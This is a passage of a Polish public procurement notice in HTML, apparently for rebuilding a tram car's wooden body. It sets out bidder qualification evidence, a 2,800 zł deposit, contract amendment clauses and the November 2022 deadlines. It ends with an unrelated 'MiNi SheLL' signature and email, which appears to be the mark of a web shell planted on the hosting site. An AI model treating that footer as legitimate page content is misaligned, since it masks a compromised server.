okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wykonał odbudowę pudła (drewnianej konstrukcji) wraz z<br/>wyposażeniem co najmniej jednego wagonu, który został dopuszczony do ruchu i eksploatowany w sieci tramwajowej.</span> </h3> <h3 class="mb-0">5.8.) Wykaz przedmiotowych środków dowodowych: </h3> 1. W<br/>celu potwierdzenia<br/>spełnienia warunków udziału w postępowaniu Zamawiający wezwie Wykonawcę, którego oferta została najwyżej oceniona do<br/>złożenia w wyznaczonym terminie nie krótszym niż 5 dni od dnia wezwania, aktualnych na dzień złożenia następujących<br/>dokumentów: a) wykazu usług wykonanych w okresie ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem przedmiotu wykonanych usług, dat wykonania, podmiotów<br/>na rzecz których usługi zostały wykonane. Wzór wykazu stanowi załącznik nr 3 do SWZ. Pod pojęciem „usługi wykonane” rozumie<br/>się usługi zrealizowane. Do wykazu należy dołączyć dowody określające czy te usługi zostały wykonane należycie, przy czym<br/>dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez podmiot, na rzecz którego usługi były<br/>wykonywane, a jeżeli wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów z - oświadczenie<br/>wykonawcy; 2. Zamawiający nie określa szczególnego sposobu spełnienia przez Wykonawców wspólnie ubiegających się o<br/>udzielenie zamówienia warunków udziału w postępowaniu. Warunki udziału mogą być spełnione łącznie. 3. Wykonawcy wspólnie<br/>ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z wykonawców, którzy wykonają usługi, do realizacji<br/>których te zdolności są wymagane. Wówczas do oferty należy załączyć oświadczenie, z którego wynika, które usługi wykonają<br/>poszczególni wykonawcy. Wzór oświadczenia stanowi załącznik nr 9 do SWZ. <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 6.4.1) Informacje dotyczące wadium:<br/>1. Wykonawca zobowiązany jest do wniesienia wadium w wysokości: 2.800,00 zł (słownie: dwa tysiące osiemset złotych))<br/>2. Wadium może być wniesione w jednej lub kilku następujących formach tj.:<br/>2.1. pieniądzu;<br/>2.2. gwarancjach bankowych;<br/>2.3. gwarancjach ubezpieczeniowych;<br/>2.4. poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy z dnia 9 listopada 2000 r. o<br/>utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2020 r. poz. 299).<br/>3. W przypadku wnoszenia wadium w pieniądzu, wadium należy wpłacić przelewem na rachunek bankowy Zamawiającego<br/>nr: Santander Bank Polska nr 77 1090 2053 0000 0001 4392 4324 (dla przelewów zagranicznych w PLN (IBAN): PL 77<br/>1090 2053 0000 0001 4392 4324 SWIFT CODE: WBKPPLPP) z dopiskiem „Wadium do zabezpieczenia oferty złożonej<br/>przez ……., znak sprawy LP.281.198.2022”. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku<br/>bankowym.<br/>4. Pozostałe informacje dotyczące wadium zawarte są w SWZ i ustawie Prawo zamówień publicznych. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> § 13<br/>2.	Zamawiający przewiduje możliwość istotnej zmiany umowy w następujących przypadkach:<br/>1)	zmiany przepisów prawa powszechnie obowiązującego, jeżeli zmiana ta wpływa na zakres lub warunki wykonania przez Strony świadczeń wynikających z umowy, jeżeli zmiana ta będzie miała wpływ na koszty wykonania zamówienia przez Wykonawcę;<br/>2)	konieczności zmiany sposobu realizacji umowy lub zmiany terminów określonych w umowie z uwagi na wystąpienie okoliczności spowodowanych siłą wyższą zdefiniowaną w § 15 umowy i na warunkach określonych w § 15;<br/>3)	powstania rozbieżności lub niejasności w rozumieniu pojęć użytych w umowie, których nie da się usunąć w inny sposób, zaś zmiana będzie umożliwiać usunięcie tych rozbieżności i doprecyzowanie postanowień umowy w sposób jednoznaczny dla jej interpretacji przez Strony;<br/>4)	oczywistych omyłek pisarskich i rachunkowych mogących mieć wpływ na interpretację postanowień umowy;<br/>5)	obniżenia cen - w każdym czasie bez względu na okoliczności;<br/>6)	wydłużenia w prawnie dopuszczalnym zakresie terminów płatności za zgodą obydwu Stron;<br/>7)	zmiany rozwiązań projektowych technicznych lub technologicznych lub materiałowych, gdy z uwagi na postęp techniczny zastosowanie przyjętych w dokumentacji,<br/>8)	wystąpienia opóźnień w wydawaniu decyzji, zezwoleń, uzgodnień (dot. w szczególności uzyskania pozytywnych wyników badań) do wydania których właściwe organy są zobowiązane na mocy przepisów prawa, jeżeli opóźnienie przekroczy okres przewidziany w przepisach prawa, w którym ww. decyzje powinny zostać wydane oraz nie są następstwem okoliczności, za które Wykonawca ponosi odpowiedzialność;<br/>9)	wydłużenia gwarancji jakości lub rękojmi za wady za obopólną zgodą Zamawiającego i Wykonawcy.<br/>3.	W przypadku, o którym mowa w ust. 1 pkt 1), umowa może podlegać zmianie w takim zakresie, w jakim zmiany są niezbędne do dostosowania umowy do zmienionych przepisów.<br/>4.	Wnioski Stron o dokonanie zmian w umowie powinny być składane na piśmie <br/>i zawierać dokładny opis proponowanej zmiany. Do wniosków należy załączyć dokumenty uzasadniające wprowadzenie zmiany.<br/>5.	Po otrzymaniu wniosku o dokonanie zmiany lub po złożeniu propozycji zmiany, Strona pisemnie poinformuje drugą Stronę o możliwościach i warunkach wprowadzenia zmian.<br/> § 13a<br/>1. Niezależnie od postanowień § 13 zmiana wynagrodzenia jest dopuszczalna w razie zmiany cen materiałów lub innych kosztów związanych z realizacją zamówienia, jeżeli będą one miały wpływ na zmianę kosztów wykonania umowy przez Wykonawcę, <br/>2. Wprowadzenie zmian, o których mowa w ust. 1 dokonuje się na pisemny wniosek Strony zawierający uzasadnienie faktyczne i prawne konieczności wprowadzenia zmian oraz kalkulację wpływu zmiany na koszty wykonania umowy. Strona wnioskująca o zmianę zobowiązana jest do złożenia dowodów, w tym dokumentów potwierdzających wystąpienie okoliczności wskazanych w ust. 1 oraz ich wpływ na koszty realizacji niniejszej umowy. <br/>3. W przypadkach, o którym mowa w ust. 1 umowa podlega zmianie w zakresie wynagrodzenia przysługującego Wykonawcy, proporcjonalnie do wpływu zmiany na koszty wykonania umowy. Podstawą wniosku o zmianę wynagrodzenia nie może być zmiana charakteru zatrudnienia personelu w stosunku do charakteru zatrudnienia wynikającego z oświadczenia Wykonawcy (załącznik nr 5 do umowy) ani zmiana liczby personelu. Wykonawca zobowiązany jest dostosować ilość osób wskazaną w załączniku nr 5 do umowy do swoich potrzeb i uwzględnić ją przy kalkulowaniu ceny zaoferowanej na etapie składania oferty.<br/>4. Po otrzymaniu wniosku o dokonanie zmiany lub po złożeniu propozycji zmiany, Strona pisemnie poinformuje drugą Stronę o możliwościach i warunkach wprowadzenia zmian.<br/>5. W przypadku zmiany ceny Wykonawca jest zobowiązany do dokonania tożsamych zmian w umowach ze swoimi Podwykonawcami. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-11-24 11:30</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">Platforma zakupowa Zamawiającego</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-11-24 12:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-12-23</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com